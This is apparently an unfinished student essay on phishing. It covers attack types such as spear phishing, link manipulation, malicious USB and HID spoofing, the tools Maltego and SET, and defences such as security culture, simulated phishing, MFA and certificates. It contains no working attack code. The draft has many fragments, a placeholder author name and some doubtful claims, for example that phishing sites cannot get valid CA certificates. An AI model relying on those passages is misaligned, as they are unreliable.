HE term phishing was coined in the 1990s
and was used to define the act of sending fraudulent correspondence such as
phone calls or emails to manipulate individuals into revealing personal
information. The hacking tool AOHELL is reported to contain the first recorded use
of the term. The hacking tool featured a phishing method of stealing the personal
details of America Online (AOL) users. Over the years phishing attacks have
increased in number as improving technologies have enabled phishers to apply
their skills in new previously unforeseen ways. The global impact of phishing has
been shown to exceed $5 billion
Increasing dependence on
IT brings increased and unforeseen risks DoD states cyberspace as the fifth
battlefield showing that information security is a fundamental requirement of
todays society. Many IS threats currently exist in the form of malicious
hackers or phishers. Attackers may vary in the level of skills they display,
some may be opportunistic hackers that have fraydulently entered a users
personal login information whilst other amateur hackers may use pre created
software that assists with the process. More skilled attackers may be career
criminls,cyber terrorists or state supported spies.
The amount of security
breaches has been shown to have dramatically increased as societys reliance on
technology and interconnectivity progresses .
One of the major causes
of these security breaches is a rise in the amount of phishing attacks, which
is a method of gaining the personal
information of the individual by exploiting the weaknesses in both human
psychology and technology, with a specific focus on the human aspect.
Why phish? Mainly
because it is relatively easy in comparison to other hacking methods as it
focuses its attacks towards people not technology. Tchnology is ubiquitous in
todays societyhowevr he knowledge behind the safe and effective use of the
tools is not as prevalent, with many users vastly under estimating the level of
threat to the safety of their personal information, phishing is proving to be a
very effective way of gaining access to
modern phishers: their
motivations, techniques and tools
The most sought after types
of information is information that can be used to recreate a persons identity
such as name, address and government ID numbers, usually as a tool to gain
access to financial assets
In order to gain access
to an individuals personal details phishing attacks very often employ social
engineering tactics as a tool to achieve their goals, social engineering can be
seen as an attempt to gain the trust and manipulate the behavior of another,
often via the creation of tools to assist in obtaining that individuals / organisations
private information or assets.
involves the sending of mass emails that contain some form of message intended
to get the user to click a link that usually redirects to a malicious webpage
designed to capture that users information, these attacks can vary in
complexity with some being very convincing representations of the webpages they
Often phishing involves
the use of some form of malicious software such as key loggers, screen loggers,
that capture information that is being processes through a users computer, this
information can then be used to gain access to the users personal information.
malware such as trojan virus, using malicious
software attackers are then able to perform various other attacks to the system,
these types of attacks can also present the issue of remaining on the users
system undetected allowing for further attacks in the future.
Phishing attacks can
present further problems by allowing the attacker to carry out attacks such as
session hijacking, host file
Types of phishing
Current phishing attacks
can be perpetrated by an individual or they can also rely on teams of
individuals working together. Studies performed by (Qingxiong M., 2017) have revealed a new trend of email phishing
via the use of multi-staged, cross country team work. (Qingxiong M., 2017)
states that “Understanding of the phishing process and these characteristics is very important to develop
effective counter-measures to protect the information assets.”
Generic phishing campaign
often consist of the mass sending of emails that are designed to emulate that
of legitimate established businesses. These emails usually request some form of
verification of personal information and can also contain links to redirect the
user to fraudulent web pages or enable malicious software to be downloaded onto
the host system.
In contrast to the
generic phishing campaign where an attacker may attempt to gain the information
of a vast amount of people, spear phishing attacks target fewer and more
specific individuals, with one specific form of spear phishing known as whaling
which refers to a campaign that focuses on high value targets such as business
executives these attacks require a larger amount of time and skill as the
attacks are created using information that is specific to the individual being
targeted, spear phishing is shown to be the most successful form of phishing as
it is supported with personal information that enhances the percieved
authenticity of the attack. Finance, insurance and real estate are shown by
Symantec(2016) to have made up the majority of spear phishing attack targets
Spear phishing relies
heavily on gaining information on a target via reconnaissance. One spear
phishing tool used to assist in the task, Maltego, uses Open Source
Intelligence to gather publicly available information on a target such as email
addreesses, public profiles and publicly uploaded files.
Phishing uses link
manipulation techniques to redirect udsers to fraudulent websites, via the use of emails designed to replicate
that of a legitiame source, the attacker may include a link that appears
identical to the legitimate website, however through the use of tactics such as
simply replacing an easily confused leter or number they are able to redirect
the user to a malicious website where they can then attempt to harvest that
users personal information or perform further attacks.
Website forgery attacks
consist of an attacker explointing flaws in trusted website’s scripts. These
types of attacks also known as cross-site scripting involve an attacker
direct the user to enter their personal information into a fraudulent
recreation of a webpage such as a financial institution. These attacks can be
very difficult to spot without specialist knowledge with previous evidence
showing an attack such as this against Paypal (2008)
Web Based Delivery
Web based delivery is.
Also known as “man-in-the-middle,” due to the fact that the hacker is situated in between the website
the user intends to use and the actual phishing system.
By using this technique
an attacker can capture details during a transaction between the website and
the user. The phisher is then able to monitor the connection and continue to
log any details the user enters.
Social Engineering Toolkit
Toolkit (SET) is open-source software that greatly simplifies the process of
many phishing attacks such as performing mass email attacks. It focusses on the
human element of penetration testing and was created as a means of simulating
Malicious usb tools have
been shown to be a very effective way of exploiting the human aspect, ait has
been demonstrated that an unattended USB
left in a public place has a high possibility of being inserted into a computer
by an unknowing individual. Once this has occurred the USB can be used to
perform various attacks on a system It phishes the user for their login and
password once the user clicks on the files.
• 0-day attacks exploit vulnerabilities
within USB drivers that enable an attacker to gain direct control of a system as soon as the USB
is plugged into the system.
• Social engineering attacks employ a USB that contains HTML files. Once a
user clicks on one of the HTML files they are redirected to a malicious tool
that attempts to steal their personal information such as usernames and
Human Interface Device (HID) spoofing
USB drive that is able
to emulate a keyboard and compromise the targets system by injecting keystroke
commands as soon as the USB is inserted into the computer.
Ransomware denies access
to a device or files until a
ransom has been paid.
Ransomware for PC’s is malware that can be installed on a user’s workstation using
a social engineering attack. The high-level of harm that can be caused by
ransomware was hihghlighted in 2016 when the Wannacry ransomware attack
disabled the systems of major insttitutions globally including healthcare.
Although evidence shows that this example was not an instance of phishing it is
still evidence of the harm that could be caused by a phisher with this tool.
(MITM) Phishing Kit, a simple UI that enables phishers to effectively reproduce
websites and capture any log-in details a user has entered.
Human and technological aspect
of phishing attacks
Addressing the human aspect of
phishing attacks through an individual or organizations Information Security Culture?
practices and behaviours within an organization that relate to the
overall security of its information and assets is referred to as its information
security culture (ISC). Niekerk & Solms (2010:479) state that “Many of the
processes needed to protect these information assets are, to a large extent dependent
on human cooperated behavior.”
It has been shown that the average computer
user has little to no concept of information security, with a large majority of
people within organisations, including management, considering information
security to be the responsibility solely of
the IT department.
As the fundamental principle of phishing
attacks is to exploit the human elements within
a system it is evident that the weak link in any systems information
security is the human individuals that interact with the system and that a
strong isc is a major factor in reducing the amount of successful phishing
A strong ISC works to account for threats
and vulnerabilities, mitigate risks and protect information assets to ensure
the confidentiality, integrity and availability of information within a system.
These three concepts
form the CIA triad of information security, which is a conceptual framework
which provides a method of evaluating and implementing information security.
The CIA triad covers all aspects of security that phishers tend to exploit
therefore it is an important tool in any individual or organisations defense
against phishing attacks.
The CIA triad is
designed to be interchangeable to suit a system or organizations specific
security needs. The three concepts of the triad have specific requirements and
Confidentiality ensures that information
within a system is only accessible by authorized personnel. Confidentiality
within a system can be achieved through methods such as, policy based security,
user credentials such as ID and passcodes and access control lists (ACL).
Ensing confidentiality within a system acts to limit the information available
to phishing attacks.
Integrity. Ensures that the information
within a system can only be edited by authorized personnel making it much more
difficult for an attacker to modify any files within the system. integrity ensures
that information within a system is genuine. Key processes that assist in
providing system integrity include hashing algorithms and data encryption. Many
phishing attacks rely on the alteration of some information within a system
therefore ensureing integrity within a system is a key factor in determining
how vulnerable the system is to any form of attack.
Availability of information within a
system ensures the availability of information when it is required. Methods of
maintaining availability include,software upgrading, software patching,hardware
maintenance and network optimisationy
Human-based countermeasures and behavioral
factors are a significant factor in preventing phishing attacks. Therefore, to
decrease the number of successful phishing attempts it is important to consider
how threats to the human aspect can best be mitigated.
Simulated Phishing Campaigns (SPC) as part
of IS management strategies have been shown to assist with targeted training
and result in greatly reduced the amount of monitored phishing click events. A
simulated phishing campaign is one where the phishing is self-inflicted by the
organization as part of a staff training exercise in IS, an organization may
deploy a phishing email created in house and monitor the resulting click
events, this can then better inform staff training and ensure that the training
is targeted to the staff that most require the support.
Various software’s exist that assist with creating
an SPC such as PhishSim, AwareEd, and SecuityIQ . This software train users to
better spot suspicious emails. Debate still exists in the best way to implement
a SPC as evidence has shown repeated attempts can cause an organizations staff
to disregard future attempts and therefore increase security risks.
A variety of factors have been found to
have an effect on human security awareness, including experiential factors such
as user’s security knowledge web
experience, computer self-efficacy, and dispositional factors such as user’s
disposition to trust, perceived risk, and suspicion of humanity
An information security management system
(ISMS), is used to minimize the risk to an organisations information assets
That may occur through a security breach
within an organization. An effective ISMS will govern policies, procedures, and
strategies needed to ensure the security of information assets.
to address the Technological aspect of phishing
Multi factor authentication
Authentication is a
function of some combination of something you have, such as an ID, something
you know such as a password or something you are for example biometric
Along with username/password,
Multi-Factor authentication systems require a user to enter separate form of
authentication, such as a PIN number, or a fingerprint. Two-Step Verification has been provided by
companies such as Google, however, a recent phishing attack that afftected
solutions make use of established pattern recognition and blacklisting
approaches but are not expected to be fully effective on their own and are
widely seen as being components of an integrated solution. Digital
certificates, on the other hand, are designed to provide an effective whitelist
of assured identities. There is also a clear synergy between the roles of
certification authorities and traditional trusted third parties such as banks,
auditors and online business information providers which means that existing
certification services can readily be leveraged to provide the consumer with
evidence of legitimacy and good standing in addition to mere identity.
Most of the
sites have a server certificate also called an SSL certificate which is signed
by a trusted third party certificate provider (called Certificate Authority).
Your browser has an inbuilt list of authorised third party certificate
providers(CAs) and if the site you open provides a certificate signed by one of
these CAs then the browser knows that it is a safe site.
sites cannot obtain a valid CA certificate, because the CAs will not authorise
a fake site and that is one of the easiest way to find a site which is built
It should be
noted that many companies do not get a CA certificate for their own internal
websites and your browser might throw a warning when you access such sites. But
if you know the site is safe you could ignore this warning.
believe some browsers can check the URL as well and identify URLs which look
fake. Not sure about this though.
The average HTTP website is running over port 80, whereas the secure
version, HTTPS, runs over port 443. Using HTTPS means that the information
passed between the browser and intended server is all encrypted. Hence the
added S for secure, but visiting an HTTPS website alone is not a 100% level of
protection. A Phisher could setup a phishing site using HTTPS. The best way to
help determine the legitimacy of the site is to verify the certificate details.
A legitimate site would have a certificate issued by a reputable and trusted
Properly Configured Web Browser
Most Browsers now come equipped with tools to
help combat navigating to Phishing sites such as verification of a websites
authenticity against a list of reported sites, alerts when sites try to install
add-ons and the ability to block reported attack sites and block reported web
Monitoring Phishing Sites
Microsoft and other organizations keep a running list of reported sites.
There are also online tools available that can be used to check a site out
before navigating to it. Google Safe Browsing is one of the popular online
Proper Email Client Configuration
It has been shown that, whether in a organisational or residential setting,
good IS is a systemic issue that relies on the knowledge and skills of all
involved. Even though it is not usually the end users responsibility for the
configuring an email server, the user is a part of the security process as it
is within their ability to ensure that the email client they use processes emails in a secure manner.
As there are many options available to end users, it’s important to consider
the security features of the chosen email client. Many email clients such as
Microsoft Outlook currently offer options for phishing protection and spam
filters designed to protect the end user from malicious content. Therefore, it
is the users responsibility to ensure they are familiar with all the options
and have a good working knowledge of how these features are effectively
Anti-phishing software works in a
simple way. It can fully operate irrespective of whether it is integrated into
the web browser or function in a standalone way. These programs store
common phishing scams and phishing sites.
This information is used to alert the user if he stumbles upon a potentially
dangerous site. In the case of a browser-based program, an alert may pop up at
the top of the browser’s window. In the case of standalone software, an alert
may pop up at the bottom of the user’s screen. Some can block websites and
redirect requests for certain websites to other sites.
phishing detection model
have developed a model
which detects phishing sites with multi-filter approaches and provides hints
regarding the actual site, the user is actually attempting to visit. Each layer
in this model (Auto upgrade whitelist layer, URL features layer, Lexical
signature layer, String matching layer
and Accessibility Score comparison layer).
acts as a filter to detect phishing using a
PhiDMA aims to address
the lack of specific knowledge displayed by many end users by makin the UI as
accessible as possible even for those that have visual impairments. From their
experiments, xxxx were able to demonstrate results showin that “the model could
detect phishing sites successfully and the evaluated accuracy 92.72%”.
In comparison with other
approaches, it is evident that this model results in preferable accuracy than
Tracking Phishing Attacks Over Time
Alamgirkhan, A. (2013). Preventing Phishing Attacks
using One Time Password and User Machine Identification. International
Journal of Computer Applications, 68(3), pp.7-11.
Aleroud, A. and Zhou, L. (2017). Phishing
environments, techniques, and countermeasures: A survey. Computers & Security, 68, pp.160-196.
Dakpa, T. and Augustine, P. (2017). Study of Phishing Attacks and
Preventions. International Journal of Computer Applications, 163(2),
M., Durcikova, A., Wright, R. T. (2017)
.Combatting Phishing Attacks: A Knowledge Management Approach. Proceedings
of the 50th Hawaii International Conference